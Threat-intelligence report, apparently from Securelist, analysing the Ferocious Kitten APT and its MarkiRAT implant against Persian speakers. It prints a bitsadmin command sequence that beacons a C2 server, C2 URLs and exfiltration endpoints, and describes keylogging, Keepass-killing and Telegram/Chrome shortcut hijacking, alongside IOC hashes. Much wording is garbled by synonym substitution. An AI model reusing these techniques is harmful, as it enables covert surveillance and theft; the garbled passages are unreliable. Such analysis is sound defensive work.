Ferocious Kitten is an APT group that since at least 2015 has been targeting Persian-speaking individuals who appear to be based in Iran. Although women has been active for a long time, the group has mainly operated under the radar and has not been covered by security researchers to the best of our knowledge. It is only recently that it drew attention when a lure document was uploaded to VirusTotal and moved public thanks to researchers on Twitter. Since then, one of its implants has been analyzed by a Chinese threat intelligence firm.

We were able to expand on some of the findings and conclusions about the group and provide insights into the additional variants that it applies. The malware plummeted from the aforementioned document is dubbed’ MarkiRAT’ and used to record keystrokes, clipboard content, render file download and upload abilities as well as the ability to execute arbitrary commands on the victim machine. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method.

Interestingly, some of the TTPs used by this menace actor are reminiscent of other groups that are active against a similar situated of targets, such as Domestic Kitten and Rampant Kitten. In this report we aim to provide more details on these findings and our own analysis on the mechanics of the MarkiRAT malware.

Background

Two suspicious documents that were uploaded to VirusTotal in July 2020 and March 2021, and which seem to be operated by the same attackers, caught our attention. One of such documents is called ” hmbstgy` shqnh b` shqn azdy2. doc”( translates from Persian as” Romantic Solidarity With Lovers of Freedom2. doc “) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content 😛 TAGEND

Decoy content in one of the malicious documents

After enabling their content, both documents drop malicious executables to the infected system and display messages against the regime in Iran, such as the following( translated from Persian ):

I am Hussein Jafari

I was a captive of the regime during 1363 -6 4. Add my name to the prisoners’ statement of Iraj Mesdaghi about the bloodthirsty mercenary. Please use the nickname Jafar for my own safety and my family.

Hussein Jafari July 1399

Messages that appear in the documents after enabling their content

The macros in the documents convert an embedded executable from hexadecimal and write it to the ” Public ” folder as “update.exe”. Afterwards, the payload gets facsimile to the ” Startup ” directory under the name “svehost.exe” to ensure it automatically operates when the system is started 😛 TAGEND

Macros copying the payload to the startup folder

In addition to the above documents, we managed to find malicious executables that were used by the attackers and date back to as early as 2015. It seems that in the past the attackers delivered executables immediately to the victims and only recently introduced weaponized documents as the initial infection vector.

Moreover, the attackers use the “right-to-left override” technique that induces parts of the executables’ epithets to be overruled, making them appear to have a different expansion such as. jpg or. mp4, rather than their real one. When operated, the executables display decoy content to the victims, with some presenting images of protests against the Iranian regime and its institutions, or videos from resistance camps.

Decoy image found within one of the malicious executables showing a protest against the central bank of Iran

Analysis of MarkiRAT

The aforementioned infection vectors are used to deploy unique malware we dubbed MarkiRat. While we were able to identify several versions of it, it is evident that the core of the malware remained the same. The internal epithet of the implant, as can be noted from PDB tracks in the executable binaries, is’ mklg ‘. This name perhaps stands for’ Mark KeyLogGer ‘, where’ Mark’ is an internal HTML tag used by the implant.

During its activity, we could see that the authors changed the compilation environment and incorporated new libraries to hinder both manual and automatic static analysis. From 2015 to February 2018, the malware was compiled with Visual Studio 2013 and 2015, whereas in February 2018, the developers to come to Visual Studio 2017 and embedded the malware’s logic within Microsoft Foundation Class( MFC) classes. In accordance with these changes, the internal name was also modified to’ mfcmklg.pdb’.

The MarkiRAT implant starts by performing the following actions 😛 TAGEND

Creates a mutex named “Global\\2194ABA1-BFF-A4e6b-8C26-D1BB20190312” during initialization of an MFC CWnd class instance. Expands the environment variable’ PUBLIC’ to be used as the base directory for the malware’s work repository, which is located under’ Appdata \ Windows ‘. Checks the running processes on the victim machine to look for’ exe'( Kaspersky) or’ bdagent.exe'( Bitdefender ). If one of them is discovered it will be contained utilizing a numeric value passed to the server via a parameter named’ k ‘, utilizing a GET request to the URL as are indicated below. The existence of a security solution from Kaspersky will be signified with the value’ 1′ and Bitdefender with the value’ 3 ‘. However , no change in the malware’s behavior was observed based on this check. hxxp://C2/ech/client.php?u=[computername]_[username]&k=[AV_value] Creates a log file named’ nfo’ with info as shown below( period of the implant’s initiation and its execution path ).
Hello: Fri Mar 5 18:56: 27 2021
C :\ Users \[ username ]\ AppData \ Local \ Temp \ sample.exe

Initiates communication with the C2 server by publish an HTTP POST request, registering the main victims as a new patron use the URL scheme and torso content referred to below: POST hxxp :/ /[ C2 address ]/ i.php? u =[ computername] _[ username ]& i =[ IP address]

p=
Windows Title1

Windows Title2
The expected server response accepting registration is: 3 LOK 0 Issues an additional beacon to the C2 server by utilizing Microsoft’s Bits administration utility with this command:> bitsadmin/ cancel pdj> bitsadmin/ create pdj> bitsadmin/ SetPriority pdj HIGH> bitsadmin/ addfile pdj “hxxp :/ /[ C2 address ]/ i.php? u =[ computername] -[ username ]& i =[ proxy ip] “% PUBLIC %\ AppData \ Libs \ p.b> bitsadmin/ resume pdj The purpose of this part is not fully clear, but we think it’s probably used to bypass a potential proxy server in the victim network, thus providing the C2 with the victim’s IP. Starts a keylogger with all keystrokes and clipboard content being stored locally in the aforementioned. nfo file, exfiltrated to the C2 utilize the same URL described previously in the POST request. It is significant that an active Keepass( password director) process gets killed before starting the keylogger. This is likely intended to force the user to restart the program and enter a lord password that is then stolen via the keylogger.

Following these actions, the malware initiates a thread to constantly beacon the C2, waiting to receive commands and executing them accordingly. The beacon request is issued with the following request 😛 TAGENDGET hxxp :/ /[ C2 address ]/ ech/ echo.php? req= rr& u =[ computername] _[ username]

The expected response carries a command to be executed and needs to be formatted as JSON. It is then parsed using the open-source library JsonCPP, where the following commands are supported 😛 TAGEND

cmd cmd2 cmd3 Description delay argument: time to sleep in milliseconds- Sleep for a given amount of milliseconds

uploadsf argument: route to directory that will be enumerated for file upload- Upload all the files in the controversy repository.

The upload is performed by using the following POST request: hxxps://[C2]/up/uploadx.php?=u=[computername]_[username] uploads argument: track to directory that will be itemized for file upload- Upload files in the arguing storehouse. The malware is looking for files carrying specific extensions:. rtf,. doc,. docx,. xls,. xlsx,. ppt,. pptx,. pps,. ppsx,. txt,. gpg,. pkr,. kdbx,. key,. jpg. These formats have shown that the threat actor is interested in Office documents, encryption keys, password manager files and image files.The upload is performed by using the same POST request as the one used by the’ uploadsf’ command

upload argument: track to file to upload- Upload a specific file( arguing) utilizing the same URL than the’ uploadsf’ command

smart dir- List files and repositories.

The listing is sent to

hxxp :/ /[ C2 ]/ ech/ rite.php

smart-alecky upload- upload files with carrying specific extensions (. pdf,. rtf,. doc,. docx,. xls,. xlsx,. ppt,. pptx,. pps,. ppsx,. txt;. jpg,. kdbx,. key) from pre-defined, common directories, namely: Desktop, Documents, Pictures, Downloads, ViberPC, Skype, Telegram and additional drives.

smart fulldir- List files and directories looking for filenames with the specific expansions (. pdf,. rtf,. doc,. docx,. xls,. xlsx,. ppt,. pptx,. pps,. ppsx,. txt;. jpg,. kdbx,. key) located in pre-defined, common directories: Desktop, Documents, Pictures, Downloads, ViberPC, Skype, Telegram and additional drives.

The listing is sent to

hxxp :/ /[ C2 ]/ ech/ rite.php

runinhome argument: executable file name- Run an executable are contained in the malware storehouse in the user’s home directory.

download argument1: URL to download the file argument2: route to store the downloaded file Download a file from the C2 server and store locally( filename: argument2)

Any other command that doesn’t fit the above patterns will be forwarded and processed as an controversy to’ cmd.exe/ c’ and run via the’ ShellExecuteW’ API. Additionally, each lighthouse is accompanied with a screenshot that is initially saved as’ scr.jpg’ in the public directory and subsequently issued to the C2 employing the same HTTP POST request as in the’ uploadsf’ command.

Telegram hijacking variant

One of the discovered MarkiRAT variants have enabled us to intercept the execution of Telegram and launch the malware along with it. The core of the malware is the same as described previously for MarkiRAT, with the exception of roles in charge of the malware’s deployment on the victim machine. These conduct the following 😛 TAGEND

Check for the Telegram installation directory by enumerating the files on disk and looking forward to the’ exe’ binary in a directory named’ tdata'( internal storehouse used by the Telegram desktop utility ). If the file exists, the malware facsimiles itself to the same directory as’ exe ‘, while preserving the icon of the Telegram application. Modify the shortcut that launches Telegram by replacing its route to the one corresponding to’ exe ‘, as are indicated below.

Telegram shortcut launching the warhead together with the legitimate executable

Following these actions, if’ data.exe’ is executed as a result of initiating Telegram, the usual deployment logic is skipped and the malware directly executes the real Telegram application along with the malicious MarkiRAT payload.

Chrome hijacking variant

Another interesting variant targets the Chrome browser and can be split into two components going by the following internal names( as evident from the PDB tracks left in them ):

mklgsecondary.pdb mklgchrome.pdb

The first stage logic is is in compliance with’ mklgsecondary’ which serves the purpose of downloading a file named’ chrome.txt’ from a C2 server use the BITS utility. The downloader modifies the Chrome shortcut employing its method previously described for the Telegram variant. The downloaded PE file (‘ chrome.txt ‘/’ mklgchrome ‘) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload. As is the case with variants targeting Telegram installations, the usual initialization routine is skipped.

Downloader

One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, get executed upon initiation of an MFC dialog object during runtime. Notably, it contains the PDB path’ D: \ mklgs \ mfcdownl \ Release \ mfcdownl.pdb ‘, resembling those used by the malware authors in all other variants, and contacts the C2 server behind the domain’ microsoft.com-view [.] space ‘, which was also observed in other recent MarkiRAT samples. The apply of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs.

The execution flow of this ingredient is mostly straight-forward and is a matter of the following 😛 TAGEND

The malware checks for command line arguments containing a URL track to the C2 server and the file epithet used for the downloaded executable. If less than three controversies are passed, the program aborts. The file is downloaded from the hardcoded domain’ com-view [.] space’ utilizing the WinHttp API, passing the second argument as the server track from which the file will be downloaded and employing the third argument for the retrieved payload’s filename to be saved in the% PUBLIC% directory. The malware produces a numeric value based on the current system time and uses it to rename the downloaded binary( i.e ., it will be stored as . exe in the% PUBLIC% directory ). Finally, the downloaded payload is executed by resolving the path of exe and passing the newly produced track of the downloaded binary as an controversy. The ensuing command line is initiated as a new process using the’ CreateProcessW’ API function.

Interestingly, the sample contains hardcoded strings in Arabic taken from the Quran that appear at the beginning of the function with the malware’s business logic. The second poem means” And We shall create a barrier in front of them and a barricade behind them, and cover them over so that they will not be able to see .” It is often used when one is being chased by an enemy, in the to be expected that they are overlooked.

Verses from the Quran in the malware

Evidence of Android implants

Apart from the PE malware, we were able to identify several URLs in our telemetry that indicate there were Android applications hosted on the C2 infrastructure 😛 TAGEND

hxxp :// updatei [.] com/ ddd/ classes.dex hxxp://updatei[.]com/hr.apk

Unfortunately, we were unable to obtain the underlying samples and is accordingly only assume that these are malicious implants targeted at mobile consumers, developed and leveraged by the threat actor. That said, similar activity aimed at targets in Iran suggests that actors engaged in this type of pursuit may very well be operating several campaigns, each focusing on a different technological platform with categorized targeting based on victim profiles. An instance of this was mentioned in our recent APT tendencies report and discussed more thoroughly in a private report delivered to clients of our APT reporting service, where we identified the DomesticKitten threat actor spreading both Windows- and Android-based malware against Persian-speaking customers within the same timeframe.

Who are the targets?

The attack appears to be chiefly targeting Iranian victims. In addition to the mostly Persian file epithets, some of the malicious websites use subdomains impersonating popular services in Iran to appear legitimate. For instance, “aparat.com-view[.]space” was simulating Aparat, an Iranian video sharing service, while “khabarfarsi.com-view[.]org” was simulating an Iranian news website.

In addition to the Telegram payload variant analyzed above, one of the malicious samples discovered was a backdoored version of Psiphon, an open-source VPN tool often used to bypass internet censorship. The targeting of Psiphon and Telegram, both of which are quite popular services in Iran, underlines the fact that the payloads were developed with the purpose of targeting Iranian customers in psyche. Moreover, the decoy content displayed by the malicious files often made use of political themes and involved images or videos of resist basis or strikes against the Iranian regime, suggesting the two attacks is aimed at potential supporters of such movements within the country.

A stronger indicator for the aforementioned victim profile can be observed in the code itself, particularly in the keylogger’s logic. Before writing a keystroke to the log, the malware acquires the current locale identifier applying the’ GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429. This value corresponds to the Persian language ID, thereby solidifying the assessment that the targeted consumers are Persian speaking.

Locale check before writing a keystroke to a file, depicting hardcoded values corresponding to the Persian language ID( 0x0429)

The Kitten linkage

During our analysis we observed similarities between Ferocious Kitten and other menace groups, namely Domestic Kitten and Rampant Kitten, both in terms of their TTPs and victims. Like Domestic Kitten, Ferocious Kitten has employed the same set of C2 servers over extended periods of time and shows the same URL patterns for C2 communication using only three letters such as ” updatei [.] com/ fff /” or “update[.]com/fil/”.

Just like Rampant Kitten, both menace groups attempted to gather information from the Keepass password manager and altered the execution flow of Telegram Desktop to ensure the persistence of their malware. And although we were unable to find solid the relation between the codebase or infrastructure of these groups, the various campaigns operated by the three menace groups share a distinct targeting strategy and go after Iranian victims.

The WHOIS information of the malicious domains showed that Ferocious Kitten employed Iranian hosting services such as Pardaz IT or Farasat IT Group. Furthermore, some of the PDBs in the malicious samples from 2017 mentioned the name “Ghabli”( e.g .,’ D: \ ghabli \ Projects \ mklgtelegram \ Release \ mklgtelegram.pdb ‘), which appears to be a Persian surname.

PDB path from a Ferocious Kitten sample

An interesting thing to note is that one of the domains we are monitoring for related activity,’ updatei [.] com ‘, are used in a Facebook page called ” Iranian Association of Combatant Programmers”( translated from Persian ). The attackers registered this realm in February 2015, and the post was released in march of the same year. The URL mentioned in the post was meant to download an archive called ” cports.rar” that supposedly contained the “cports.exe” tool; regrettably, we couldn’t examine the archive’s contents because the website was down at the time of writing of analysis.

Translated post from Facebook page mentioning one of the malicious domains

Judgment

Ferocious Kitten is an example of an actor that operates in a wider ecosystem intended to trail someones in Iran. Such menace groups do not appear to be covered that often and can therefore get away with casually reusing infrastructure and toolsets without worrying about them being taken down or flagged by security solutions.

Additionally, such groups are known to target various platforms( most notably Windows and Android) and often share TTPs, as indicated in this report. The latter in particular may suggest that the underlying performers may be interconnected, sharing developers or operating under a reciprocal bos. While not technically impressive, it’s interesting that the actor generated specialized variants to be launched alongside popular programs, namely Chrome and Telegram. The technical sophistication of the toolset doesn’t appear to be a high priority for the attackers, who seem to be more intent on expanding their arsenal.

IOCs MD5 SHA1 SHA2 56

5B4B42A8A730FAE1B786326F27613DA4 736331C23D1813278C458B5EA8334AB14511AFA6 E7986CD2D31EDD7CCB872DC1F0F745BE6A483676CE0291F3C88B94B0E2306EA0

91EBDE892ED57F19C0CBAB98D04648CE 9BCF60F1C806947DBBB0729F2E07496ABE1B47B7 2E8288C4603A04281127055B749E246ABFD7F6B0F261BFF96A47959DCAE4EE39

7C83EC6D8459AC989669899071F41AE1 A7F6963929A5709A841DE71D99EFB1F91CF31F8E BA300A293CC4BC39DD9D40A3C53ECE51AC80AF053175361D83D6ECB8735C45AF

B2FE 8C3BA2B9639F34C1727D50C4918D 1B9908CEC557879382B63F071EC710BE5B68EE79 7699 C50E8FED564B83FB0996E700FE51900E4F67CEC4E669ED431E6A6F120865

4F1C9411739F7D3E5E418D4CD264E9A3 A1DD1AEE6BB3EE3F8C3CEE08955F3285C4E95439 EC7196E98B7990B69ED58F49E5A87D1FDA8BF81EB5CD7EEB9176F6E96A754403

698201F289110A6DCFF75407AB02E917 B59910F3AD87010140100EA63B9A474136BB5A97 FA9C0E0CB88B34D51DEB257639314CF54CB11F9867A27579521681A2E17DA4C4

61DA1A5FA3D0D4E69A9EA6AF53A91E45 397C359064C5282276B7717731A6FDB998C31A0F 489 B895AD66F13C2A4FFEB218E735CACE2B23D36FA55CD07B7EDB4FBC03048CB

254A065A2C9CF8FF6BDD98EC120B3222 93AE9778E55764F05E7D637E10A0D77EC3F6F6F7 AB3E9F65C60C1760AFC99629CAEE7FAB8DBA117A16A7F9F843EC43617E824B0D

6747E3953775FB226DA0723A94490FDB F37003A6B6896D233A019E0E672FD9E92D261FC0 54 BD9FE21289FAC0D48CC388AA35ECDC854D8C81865564DCB21FC1D73D22B86B

D2 2D9CE61E6AEA72AA9A8A233530DB43 9923473C594FF12904E37A2405F619A7DC98D905 3A4EF9B7BD7F61C75501262E8B9E31F9E9BC3A841D5DE33DCDEB8AAA65E95F76

F9 509755 C5781F87788FFDF9EFAD075D 3E30D4DA7AA25CA8D44851848B05EFF758CEEB46 274 BEB5 7AE19CBC5C2027E08CB2B718DEA7ED1ACB21BD329D5ABA33231FB699D

CE5A 7612892 F27299362AE0569507E04 609D4099CA91A494B22738E2050DD8CF12C61917 B71C87AD8A0D179FC317656B339A57F2775B773C0FC54EA2B0B8D171B7AF7A8A

B0 632 B202EB5D204DF112E1B5BAC3F21 4C33552788239DCF044CDDEE51D2000F04509FC1 A7C25D943F8B8689B4A55771349DD7B746FEC094E5CC3F693C90801560A1808C

3D6D731F03A0FCF4DB9506FF9BDB7231 83E00F2E844795606B90C314495E91932B14F863 405 DEB3A 129 DF7B56357966B723A14C0AA9BC3615E2A20FCCD7D2B5A8CEAB30D

1FE34D84A058156296E86888DDD5CAC9 B7B6345D9107CF7997646F3B04ED423C1271D070 636 FEE5 1245685 DE8F85D2D8AF1DD1351267DBB9F9E571685A76D3894ED931DA

C8 88 F680B9BC3AABF0EC1CDD312436B5 B831C659335F669F7C2B48ABE281F066BE75D7AF 1E21645147AA4EAC33495AA1713FFA30DEF0758F810CA944580A14BE2828643D

8187B9A9AF3EB78EE3B1190BB1DB967E C2E9EAE6F870737DD4B6A6057BAC35FF7CC5E244 D723B7C150427A83D8A08DC613F68675690FA0F5B10287B078F7E8D50D1A363F

E4 3E11B074FA7B071DEC9BC294E0F95C FFB76C958C1B53AF09913C268C8E90F873D53F1A 3C94EBA2E2B73B2D2230A62E4513F457933D4668221992C71C847B79BA12F352

Read more: securelist.com